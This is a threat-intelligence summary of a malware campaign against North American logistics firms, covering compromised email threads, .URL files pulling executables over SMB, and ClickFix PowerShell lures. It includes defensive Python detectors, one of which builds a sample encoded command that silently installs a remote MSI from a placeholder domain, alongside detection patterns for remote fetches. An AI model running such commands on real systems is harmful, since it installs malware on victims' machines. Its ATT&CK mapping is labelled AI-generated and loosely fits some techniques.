- Short Summary: Proofpoint researchers are monitoring a cluster of cyber activities targeting transportation and logistics companies in North America. The attacks involve compromised email accounts to deliver various malware payloads, including Lumma Stealer, StealC, and DanaBot, using social engineering tactics to make messages appear legitimate.
- Key Points:
- Targeting transportation and logistics companies in North America.
- Use of compromised legitimate email accounts for malware delivery.
- Malware payloads include Lumma Stealer, StealC, NetSupport, DanaBot, and Arechclient2.
- Initial access methods and malware delivery techniques have evolved since May 2024.
- Campaigns often include messages with Google Drive URLs or .URL file attachments.
- New technique “ClickFix” used to deliver malware via PowerShell scripts.
- Threat actors impersonate legitimate software used in transport and fleet management.
- Proofpoint has not attributed the activity to a specific threat actor.
- Increased sophistication in social engineering tactics observed.
- Users are advised to verify suspicious emails through alternative communication methods.
- MITRE ATT&CK TTPs – created by AI
- Initial Access (T1078)
- Use of compromised email accounts to gain access to legitimate conversations.
- Execution (T1059.001)
- Execution of Base64 encoded PowerShell scripts via the “ClickFix” technique.
- Persistence (T1136)
- Malware installation through remote shares using SMB.
- Command and Control (T1071)
- Use of URLs leading to malicious payloads hosted on compromised servers.
- Exfiltration (T1041)
- Potential data theft via malware like Lumma Stealer and StealC.
What happened
Proofpoint researchers are tracking a cluster of activity targeting transportation and logistics companies in North America to deliver a variety of different malware payloads.
Notably, this activity leverages compromised legitimate email accounts that belong to transportation and shipping companies. At this time, it is unclear how the actor achieves access to the compromised accounts. The actor then injects malicious content into existing conversations within the account’s inbox, which makes the messages look legitimate. Proofpoint has identified at least 15 compromised email accounts used during these campaigns.
Researchers have been tracking this activity cluster since late May 2024. Activity from May to July 2024 predominantly delivered Lumma Stealer, StealC, or NetSupport. In August 2024, the threat actor changed tactics, employing new infrastructure and a new delivery technique and adding payloads to deliver DanaBot and Arechclient2.
Most campaigns use messages with Google Drive URLs leading to an internet shortcut (.URL) file, or a .URL file attached directly to the message. If executed, it uses SMB to access an executable from the remote share, which installs the malware.
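Because this chain hinges on an Internet Shortcut whose target is a remote SMB share rather than a web page, a mail gateway or endpoint script can parse the .URL file and flag that case before anything is fetched. The following Python is an added example, not Proofpoint's tooling; the sample shortcut files and the 203.0.113.10 address are constructed placeholders.

```python
import configparser
from urllib.parse import urlparse

# Constructed sample Internet Shortcut files; the UNC and file:// targets use a
# TEST-NET address and are placeholders, not indicators from the brief.
SAMPLES = {
    "benign.url": "[InternetShortcut]\r\nURL=https://www.example.com/\r\n",
    "smb_unc.url": "[InternetShortcut]\r\nURL=\\\\203.0.113.10\\share\\rate_confirmation.exe\r\nIconIndex=0\r\n",
    "smb_file.url": "[InternetShortcut]\r\nURL=file://203.0.113.10/share/carrier.exe\r\n",
}

REMOTE_SCHEMES = {"file", "smb"}
# Extensions a shortcut should never need to reach over a remote share.
EXEC_EXT = (".exe", ".vbs", ".js", ".jse", ".msi", ".bat", ".cmd", ".scr", ".lnk", ".hta")


def parse_url_target(text):
    """Return the URL= value of an Internet Shortcut (INI-style file), or None."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text.replace("\r\n", "\n"))
    return cp.get("InternetShortcut", "URL", fallback=None)


def classify_target(url):
    """'web' for http(s); 'remote_share' for a UNC or file:// path on another
    host (fetched over SMB); 'remote_share_executable' when that path ends in
    an executable extension; 'no_target' when the shortcut has no URL= entry."""
    if not url:
        return "no_target"
    u = url.strip()
    is_unc = u.startswith("\\\\") or u.startswith("//")
    parsed = urlparse(u)
    is_remote_scheme = (parsed.scheme.lower() in REMOTE_SCHEMES
                        and parsed.netloc not in ("", "localhost"))
    if not (is_unc or is_remote_scheme):
        return "web"
    path = (parsed.path if is_remote_scheme else u).lower()
    return "remote_share_executable" if path.endswith(EXEC_EXT) else "remote_share"


def triage(files):
    """Map each file name to its verdict; a real tool would also log the target."""
    return {name: classify_target(parse_url_target(text)) for name, text in files.items()}


if __name__ == "__main__":
    for name, verdict in triage(SAMPLES).items():
        print(f"{name}: {verdict}")
```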
Actor responds from a compromised account to a request within an ongoing thread.
Actor using a compromised account to post a malicious link to an ongoing thread.
Campaigns typically include less than 20 messages and impact a small number of customers, all in the same transport/logistics industries in North America.
In August 2024, the actor also began using the “ClickFix” technique to deliver malware. The messages contained URLs that directed users through a series of dialogue boxes instructing them to copy, paste, and run a Base64 encoded PowerShell script embedded in the HTML page. The scripts led to an MSI file used to load DanaBot.
Initial “ClickFix” dialogue box in which clicking the “Fix it” button copies a Base64 encoded PowerShell script.
Final “ClickFix” dialogue box with instructions to open Windows PowerShell and paste and run the PowerShell script.
While Proofpoint has observed this technique leveraged by other threat actors impersonating Word or Chrome updates, these campaigns have impersonated Samsara, AMB Logistic, and Astra TMS – software that would only be used in transport and fleet operations management.
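Because the ClickFix lure ends with the user pasting a Base64 encoded command into PowerShell, process-creation telemetry is a natural place to catch it. This Python triage routine is an added example, not code from the brief: it pulls the encoded blob out of a command line, decodes it the way PowerShell does (UTF-16LE), and tags the behaviours the brief describes (remote fetch, MSI install, hidden window). The log lines and the .invalid domain are constructed placeholders.

```python
import base64
import re

# Matches -EncodedCommand and its common abbreviations followed by a Base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Behaviours the brief associates with the ClickFix scripts: fetch something
# remote and hand an MSI to the installer, usually with the window hidden.
SUSPICIOUS = {
    "msi_install": re.compile(r"msiexec(?:\.exe)?\s.*?/i\b|\.msi\b", re.I),
    "remote_fetch": re.compile(r"https?://|Invoke-WebRequest|\biwr\b|Download(?:String|File)|Start-BitsTransfer", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


def decode_encoded_command(b64):
    """PowerShell -EncodedCommand carries Base64 of the UTF-16LE script text."""
    return base64.b64decode(b64).decode("utf-16-le", errors="replace")


def analyze_command_line(line):
    """Return the decoded script and behaviour tags for one process-creation record."""
    m = ENC_FLAG.search(line)
    if not m:
        return {"encoded": False, "script": None, "tags": [], "clickfix_like": False}
    try:
        script = decode_encoded_command(m.group(1))
    except ValueError:  # binascii.Error is a ValueError subclass
        script = None
    tags = sorted(name for name, rx in SUSPICIOUS.items() if script and rx.search(script))
    return {"encoded": True, "script": script, "tags": tags,
            "clickfix_like": {"msi_install", "remote_fetch"} <= set(tags)}


def scan(lines):
    """Keep only records that carried an encoded command, for analyst review."""
    return [r for r in map(analyze_command_line, lines) if r["encoded"]]


def _encode_ps(script):
    """Helper used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed log lines (not real telemetry); the domain is a placeholder.
SAMPLE_SCRIPT = ("Start-Process msiexec.exe -ArgumentList "
                 "'/i https://clickfix-sample.invalid/placeholder.msi /qn' -WindowStyle Hidden")
SAMPLE_LINES = [
    "4688 CommandLine=powershell.exe -NoProfile -Command Get-Date",
    "4688 CommandLine=powershell.exe -w hidden -enc " + _encode_ps(SAMPLE_SCRIPT),
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LINES):
        print(r["clickfix_like"], r["tags"], r["script"])
```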
Attribution
Proofpoint does not currently attribute this activity cluster to an identified threat actor (TA). Similar techniques and infrastructure associated with ClickFix, and the combination of Google Drive URLs, .URL files, and SMB, have been observed in use by other threat actors and campaigns. Proofpoint researchers assess that the threat actor discussed in this Security Brief is purchasing this infrastructure from third-party providers.
Based on the observed initial access activity, malware delivery, and infrastructure, Proofpoint assesses with moderate confidence the activity aligns with financially motivated, cybercriminal objectives.
Why it matters
Threat actors are increasingly tailoring lures to be more realistic to entice recipients to click on a link or download attachments. Compromising legitimate email accounts and sending malicious links and attachments to an existing email conversation achieves this goal and raises the risk that recipients will install malware.
The specific targeting and compromise of organizations within transportation and logistics, as well as the use of lures that impersonate software designed specifically for freight operations and fleet management, indicate that the actor likely researches the targeted company’s operations before sending campaigns. The language used in the lures and content also indicates familiarity with typical business workflows.
This activity aligns with a trend Proofpoint researchers have observed across the cybercriminal threat landscape. Threat actors are developing more sophisticated social engineering and initial access techniques across the delivery attack chain while relying more on commodity malware rather than complex and unique malware payloads.
Members of the transportation/logistics industry, and users in general, should exercise caution with emails from known senders that deviate from normal activity or content, particularly when combined with unusual-looking links and file types such as those described in this Security Brief; in other words, emails that do not look or feel right and trigger a sense that something is off.
When encountering such activity users should contact the sender using another means to confirm their authenticity.
Indicators of compromise
Analyst note: Proofpoint researchers identified overlap in infrastructure between this threat cluster and suspected UAC-0050 activity but do not assess the activity sets to be related at this time.
Source: Original Post